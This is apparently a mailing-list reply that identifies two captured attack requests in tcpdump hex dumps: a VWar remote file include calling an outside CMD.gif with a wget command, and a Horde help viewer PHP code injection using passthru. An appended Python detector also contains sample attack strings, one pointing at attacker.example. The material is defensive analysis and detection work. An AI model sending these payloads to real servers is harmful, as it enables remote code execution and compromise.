Re: Someone scanning for new PHP issues?
On 4/16/06, Jamie Riden <jamesr@xxxxxxxxxx> wrote:
> One of these might be the Horde exploit -
> http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?
>
> cheers,
> Jamie
>
> 02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P 0:412(412) ack 1 win 65535
> 0x0000: 4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1 E.....@.q.P.....
> 0x0010: 48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d H..J...P..U"..*.
> 0x0020: 5018 ffff 3431 0000 4745 5420 6874 7470 P...41..GET.http
> 0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
> 0x0040: 7677 6172 2f69 6e63 6c75 6465 732f 6765 vwar/includes/ge
> 0x0050: 745f 6865 6164 6572 2e70 6870 3f76 7761 t_header.php?vwa
> 0x0060: 725f 726f 6f74 3d68 7474 703a 2f2f 7870 r_root=http://xp
> 0x0070: 6c2e 6e65 746d 6973 7068 6572 6532 2e63 l.netmisphere2.c
> 0x0080: 6f6d 2f43 4d44 2e67 6966 3f26 636d 643d om/CMD.gif?&cmd=
> 0x0090: 7767 6574 2048 5454 502f 312e 300d 0a48 wget.HTTP/1.0.

This is a VWar vulnerability in the get_header.php file (remote file
include vulnerability). More info at
http://www.securityfocus.com/bid/17358/info.

> 02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P 1205950111:1205950537(426) ack 2648749032 win 65535
> 0x0000: 4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1 E.....@.r.N.....
> 0x0010: 48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8 H..J...PG.V.....
> 0x0020: 5018 ffff 1fd8 0000 4745 5420 6874 7470 P.......GET.http
> 0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
> 0x0040: 7765 626d 6169 6c2f 686f 7264 652f 7365 webmail/horde/se
> 0x0050: 7276 6963 6573 2f68 656c 702f 3f73 686f rvices/help/?sho
> 0x0060: 773d 6162 6f75 7426 6d6f 6475 6c65 3d3b w=about&module=;
> 0x0070: 2532 322e 7061 7373 7468 7275 2825 3232 %22.passthru(%22
> 0x0080: 6563 686f 2532 3049 524f 434b 5448 4557 echo%20IROCKTHEW
> 0x0090: 4f52 4c44 2532 3229 3b27 2e20 4854 5450 ORLD%22);'..HTTP
> 0x00a0: 2f31 2e30 0d0a 486f 7374 3a20 3732 2e32 /1.0..Host:.72.2
> 0x00b0: 3332 2e33 302e 3734 0d0a 5265 6665 7265 32.30.74..

This is, as you wrote above, the Horde Help Viewer remote PHP code
execution vulnerability. More info at
http://www.securityfocus.com/bid/17292.

Unfortunately, exploits are in the wild, and the Horde one is
especially bad (knowing that Horde is used a lot).

Cheers,

Bojan
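As an added example (not part of either message in this thread), here is a small Python detector that rebuilds the TCP payload from a tcpdump -X dump like the ones above and flags the two request shapes Bojan identified: a query parameter carrying a remote URL (the VWar get_header.php remote file include) and a Horde help viewer request whose module parameter contains anything other than a bare module name. The hex dump and request lines it runs on are constructed for the example (the hosts are placeholders, not the addresses from the captures), and the function and variable names are mine.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed tcpdump -X style dump of just the TCP payload (hosts are placeholders,
# not the addresses from the thread). A real -X dump also shows the IP and TCP
# headers, so the request text would begin at offset 0x0028 rather than 0x0000;
# the `skip` argument of decode_tcpdump_hex() handles that.
SAMPLE_HEXDUMP = """\
0x0000:  4745 5420 2f76 7761 722f 696e 636c 7564  GET./vwar/includ
0x0010:  6573 2f67 6574 5f68 6561 6465 722e 7068  es/get_header.ph
0x0020:  703f 7677 6172 5f72 6f6f 743d 6874 7470  p?vwar_root=http
0x0030:  3a2f 2f68 6f73 742e 6578 616d 706c 652f  ://host.example/
0x0040:  782e 6769 663f 2663 6d64 3d77 6765 7420  x.gif?&cmd=wget.
0x0050:  4854 5450 2f31 2e30 0d0a                 HTTP/1.0..
""".splitlines()

# Constructed request lines modelled on the two captures in the thread, plus two
# benign requests to the same scripts that must not be flagged.
SAMPLE_REQUESTS = [
    "GET http://target.example/vwar/includes/get_header.php?vwar_root=http://attacker.example/CMD.gif?&cmd=wget HTTP/1.0",
    "GET http://target.example/webmail/horde/services/help/?show=about&module=;%22.passthru(%22echo%20IROCKTHEWORLD%22);' HTTP/1.0",
    "GET http://target.example/webmail/horde/services/help/?show=about&module=imp HTTP/1.0",
    "GET http://target.example/vwar/includes/get_header.php HTTP/1.0",
]

HEX_TOKEN = re.compile(r"^[0-9a-fA-F]{2}$|^[0-9a-fA-F]{4}$")
OFFSET_PREFIX = re.compile(r"^\s*0x[0-9a-fA-F]+:\s*")
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
PLAIN_MODULE = re.compile(r"^[A-Za-z0-9_-]*$")


def decode_tcpdump_hex(lines, skip=0):
    """Rebuild raw bytes from tcpdump -X output lines.

    Each line is "0xNNNN:  <up to 8 groups of 4 hex digits>  <ascii column>".
    Only the hex groups are used; the ASCII column is ignored because tcpdump
    prints '.' for every non-printable byte there. `skip` drops leading header
    bytes (40 for a plain IPv4 + TCP header pair with no options).
    """
    out = bytearray()
    for line in lines:
        m = OFFSET_PREFIX.match(line)
        if not m:
            continue
        groups = 0
        for token in line[m.end():].split():
            # A full line has exactly 8 groups; stopping there keeps an ASCII
            # column that happens to look like hex digits from being decoded.
            if groups == 8 or not HEX_TOKEN.match(token):
                break
            out += bytes.fromhex(token)
            groups += 1
    return bytes(out[skip:])


def parse_query(query):
    """Split a query string on '&' only; ';' is left inside values because
    PHP injection payloads (like the Horde one) rely on it."""
    params = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.append((unquote_plus(key), unquote_plus(value)))
    return params


def inspect_request(request_line):
    """Return a list of findings for one HTTP request line; empty means nothing flagged."""
    m = re.match(r"^([A-Z]+)\s+(\S+)\s+HTTP/\d\.\d", request_line)
    if not m:
        return []
    parts = urlsplit(m.group(2))
    params = parse_query(parts.query)
    findings = []
    # Remote file include: a parameter pointed at another host, which is the
    # vwar_root=http://... shape of the first capture.
    for key, value in params:
        if REMOTE_URL.match(value.strip()):
            findings.append(f"possible remote file include: {key}={value}")
    # Horde help viewer: 'module' should be a bare module name; quotes, parentheses
    # or semicolons mean the caller is trying to break out into PHP code.
    if "/services/help/" in parts.path:
        for key, value in params:
            if key == "module" and not PLAIN_MODULE.match(value):
                findings.append(f"Horde help viewer code injection attempt: module={value}")
    return findings


def scan_hexdump(lines, skip=0):
    """Decode a tcpdump -X dump and inspect the HTTP request line it carries."""
    payload = decode_tcpdump_hex(lines, skip).decode("latin-1")
    request_line = payload.split("\r\n", 1)[0]
    return inspect_request(request_line)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[:70], "->", inspect_request(req) or "clean")
    print(scan_hexdump(SAMPLE_HEXDUMP))
```

The remote-URL check is deliberately generic rather than keyed to `vwar_root`: any include-path parameter that resolves to a URL is worth a look, and a web server or proxy log line can be fed to inspect_request() directly without going through the hex dump.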